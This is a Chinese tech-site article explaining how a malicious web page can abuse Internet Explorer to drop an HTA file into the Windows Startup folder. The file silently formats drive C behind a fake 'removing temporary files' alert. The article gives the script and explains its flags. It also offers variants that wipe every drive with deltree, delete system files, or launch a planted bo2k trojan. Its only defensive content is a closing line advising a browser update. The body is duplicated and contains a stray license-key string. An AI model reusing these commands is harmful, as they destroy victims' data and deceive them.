如何利用HTML格式化你的硬盤(pán)
更新時(shí)間:2006年09月08日 00:00:00 作者:
這是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來(lái)的
攻擊方法。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應(yīng)該就看得出來(lái)其中精隨)
現(xiàn)在我大概來(lái)解釋其中幾個(gè)項(xiàng)目所寫(xiě)的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta"
這一項(xiàng)就是指當(dāng)你看到這網(wǎng)頁(yè)它會(huì)寫(xiě)入到你的電腦啟動(dòng)目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會(huì)先問(wèn)你是否要執(zhí)行,但其中的"/autotest"這項(xiàng)。
它是一個(gè)微軟沒(méi)有公開(kāi)的功能,鍵入後format的動(dòng)作便會(huì)被強(qiáng)制執(zhí)行。
這項(xiàng)中的/q /u是令系統(tǒng)不需要檢查硬碟便會(huì)立即執(zhí)行的指令。
最後start.exe再配合/m選項(xiàng)可以使format的DOS-prompt視窗在執(zhí)行的時(shí)候處?kù)蹲钚?nbsp;
化的狀態(tài)。
執(zhí)行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項(xiàng)便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執(zhí)行它電腦中的某個(gè)程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對(duì)方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對(duì)方c:\windows\system\目錄底下的所有檔案。
後敘∶
預(yù)防遭此手段的破壞就是到微軟去更新你的瀏覽器。
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP
攻擊方法。
以下這段就是具有破壞性的HTML
Hacking Your Computer .
scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人應(yīng)該就看得出來(lái)其中精隨)
現(xiàn)在我大概來(lái)解釋其中幾個(gè)項(xiàng)目所寫(xiě)的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動(dòng)\\hack.hta"
這一項(xiàng)就是指當(dāng)你看到這網(wǎng)頁(yè)它會(huì)寫(xiě)入到你的電腦啟動(dòng)目錄底下,并命名為
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都會(huì)先問(wèn)你是否要執(zhí)行,但其中的"/autotest"這項(xiàng)。
它是一個(gè)微軟沒(méi)有公開(kāi)的功能,鍵入後format的動(dòng)作便會(huì)被強(qiáng)制執(zhí)行。
這項(xiàng)中的/q /u是令系統(tǒng)不需要檢查硬碟便會(huì)立即執(zhí)行的指令。
最後start.exe再配合/m選項(xiàng)可以使format的DOS-prompt視窗在執(zhí)行的時(shí)候處?kù)蹲钚?nbsp;
化的狀態(tài)。
執(zhí)行其他攻擊指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”這一項(xiàng)便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執(zhí)行它電腦中的某個(gè)程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對(duì)方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對(duì)方c:\windows\system\目錄底下的所有檔案。
後敘∶
預(yù)防遭此手段的破壞就是到微軟去更新你的瀏覽器。
cplic putlic eval 01Oct2001 ao9McpUFF-LvJU5BvTp-7xDVpSa4X-RrrcKpv jjCPSUITE-EVAL-3DES-NG CK-CP
相關(guān)文章
前端常見(jiàn)的安全問(wèn)題以及防范措施總結(jié)大全
隨著互聯(lián)網(wǎng)的發(fā)達(dá),各種WEB應(yīng)用也變得越來(lái)越復(fù)雜,滿足了用戶的各種需求,但是隨之而來(lái)的就是各種網(wǎng)絡(luò)安全的問(wèn)題,這篇文章主要給大家介紹了關(guān)于前端常見(jiàn)的安全問(wèn)題以及防范措施的相關(guān)資料,需要的朋友可以參考下2022-02-0210個(gè)好用的Web日志安全分析工具推薦小結(jié)
一款簡(jiǎn)單好用的Web日志分析工具,可以大大提升效率,目前業(yè)內(nèi)日志分析工具比較多,今天推薦十個(gè)比較好用的Web日志安全分析工具。感興趣的同學(xué)可以收藏一下2020-06-06網(wǎng)絡(luò)安全中SRC驗(yàn)證碼繞過(guò)思路總結(jié)
這篇文章主要為大家介紹了網(wǎng)絡(luò)安全中SRC驗(yàn)證碼繞過(guò)思路總結(jié),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-05-05注冊(cè)驗(yàn)證java代碼[針對(duì)上篇文章]
注冊(cè)驗(yàn)證代碼[針對(duì)上篇文章] ,大家可以多參考腳本之家以前發(fā)布的文章。2009-08-08